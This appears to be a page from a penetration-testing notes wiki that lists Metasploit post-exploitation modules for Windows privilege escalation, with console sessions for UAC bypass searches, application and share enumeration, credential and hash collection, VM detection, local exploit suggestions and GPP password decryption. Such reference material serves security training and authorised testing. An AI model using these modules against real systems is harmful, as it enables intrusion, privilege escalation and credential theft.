Metasploit Modules

useful metasploit modules for privilege escalation

Windows Gather Privileges

This module will print if UAC is enabled, and if the current account is ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status and current process PRIVILEGES.

Bypassuac

You can use one of the following modules to perform UAC bypass

msf5 > search bypassuac 

Matching Modules 
================ 
   #   Name                                                   Disclosure Date  Rank       Check  Description 
   -   ----                                                   ---------------  ----       -----  ----------- 
   0   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass 
   1   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 
   2   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) 
   3   exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key) 
   4   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) 
   5   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS 
   6   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup) 
   7   exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack) 
   8   exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) 
   9   exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) 
   10  exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry

Example:

Gather installed applications

msf5 exploit(multi/handler) > use post/windows/gather/enum_applications 
msf5 post(windows/gather/enum_applications) > show options 
Module options (post/windows/gather/enum_applications): 
Name Current Setting Required Description 

SESSION yes The session to run this module on. 
msf5 post(windows/gather/enum_applications) > set session 1 
session => 1 
msf5 post(windows/gather/enum_applications) > run 
[*] Enumerating applications installed on DESKTOP-L1USHAD 
Installed Applications 
Name Version 

.NET Core SDK 1.1.11 (x64) 1.1.11 
.NET Core SDK 1.1.11 (x64) 1.1.11 
ClickOnce Bootstrapper Package for Microsoft .NET Framework 4.7.03083 
ClickOnce Bootstrapper Package for Microsoft .NET Framework 4.7.03083 
FreeMind 1.0.0 
FreeMind 1.0.0 
Google Chrome 71.0.3578.98 
Google Chrome 71.0.3578.98 
Google Update Helper 1.3.33.23 
Google Update Helper 1.3.33.23 
IntelliTraceProfilerProxy 15.0.17289.01 
IntelliTraceProfilerProxy 15.0.17289.01 
Java 8 Update 201 8.0.2010.9 
Java 8 Update 201 8.0.2010.9 
Java Auto Updater 2.8.201.9 
Java Auto Updater 2.8.201.9 
Microsoft .NET Core SDK - 2.1.202 (x64) 2.1.202 
Microsoft Office Professional Plus 2013 15.0.4569.1506 
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.10.25008 14.10.25008 
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.10.25008 14.10.25008 
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.10.25008 14.10.25008 
Microsoft Visual Studio Setup Configuration 1.18.21.37008 
Microsoft Visual Studio Setup Configuration 1.18.21.37008 
Microsoft Word MUI (English) 2013 15.0.4569.1506 
Microsoft Word MUI (English) 2013 15.0.4569.1506 
Outils de vérification linguistique 2013 de Microsoft Office - Français 15.0.4569.1506 
Outils de vérification linguistique 2013 de Microsoft Office - Français 15.0.4569.1506 
TypeScript Power Tool 2.1.7.0 
TypeScript Power Tool 2.1.7.0 
TypeScript SDK 3.1.2.0 
vs_tipsmsi 15.0.27005
vs_tipsmsi 15.0.27005 
[+] Results stored in: /root/.msf4/loot/20190206101541_default_192.168.165.128_host.application_399426.txt 
[*] Post module execution completed 
msf5 post(windows/gather/enum_applications)

credential_collector

The credential_collector module harvests passwords hashes and tokens on the compromised host.

Example:

meterpreter > run post/windows/gather/credentials/credential_collector  

[*] Running module against V-MAC-XP 
[+] Collecting hashes... 
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e 
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714 
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287 
[+] Collecting tokens... 
    NT AUTHORITY\LOCAL SERVICE 
    NT AUTHORITY\NETWORK SERVICE 
    NT AUTHORITY\SYSTEM 
    NT AUTHORITY\ANONYMOUS LOGON 
meterpreter >

Enum shares

The enum_shares post module returns a listing of both configured and recently used shares on the compromised system.

Example:

meterpreter > run post/windows/gather/enum_shares  

[*] Running against session 3 
[*] The following shares were found: 
[*] Name: Desktop 
[*] Path: C:\Documents and Settings\Administrator\Desktop 
[*] Type: 0 
[*]  
[*] Recent Mounts found: 
[*] \\192.168.1.250\software 
[*] \\192.168.1.250\Data 
[*]  
meterpreter >

Check if it's a VM

msf5 post(windows/gather/enum_applications) > use post/windows/gather/checkvm 
msf5 post(windows/gather/checkvm) > show options 
Module options (post/windows/gather/checkvm): 
Name Current Setting Required Description 

SESSION yes The session to run this module on. 
msf5 post(windows/gather/checkvm) > set session 1 
session => 1 
msf5 post(windows/gather/checkvm) > run 
[] Checking if DESKTOP-L1USHAD is a Virtual Machine ..... 
[+] This is a VMware Virtual Machine 
[] Post module execution completed 
msf5 post(windows/gather/checkvm) >

Local_exploit_suggester

Metasploit has a nice module to check for local exploits:

meterpreter > background 
[*] Backgrounding session 1... 
msf5 exploit(multi/handler) > search local_exploit 

Matching Modules 
================ 

   Name                                      Disclosure Date  Rank    Check  Description 
   ----                                      ---------------  ----    -----  ----------- 
   post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester 

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 1 
session => 1 
msf5 post(multi/recon/local_exploit_suggester) > run 

[*] 10.10.10.15 - Collecting local exploits for x86/windows... 
[*] 10.10.10.15 - 29 exploit checks are being tried... 
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. 
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. 
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. 
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. 
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. 
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. 
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. 
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. 
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. 
[*] Post module execution completed

Weak service permissions

exploit/windows/local/service_permissions

GPP

Decrypting passwords that are stored in the Group Policy Preferences can be done automatically though Metaasploit. The following post exploitation module will obtain and decrypt the cPassword from the Groups.xml file which is stored in the SYSVOL.

post/windows/gather/credentials/gpp

PreviousAutomated tools NextPassword Dumping

Last updated 5 years ago

hashtagWindows Gather Privileges

hashtagBypassuac

hashtagGather installed applications

hashtagcredential_collector

hashtagEnum shares

hashtagCheck if it's a VM

hashtagLocal_exploit_suggester

hashtagWeak service permissions

hashtagGPP

Windows Gather Privileges

Bypassuac

Gather installed applications

credential_collector

Enum shares

Check if it's a VM

Local_exploit_suggester

Weak service permissions

GPP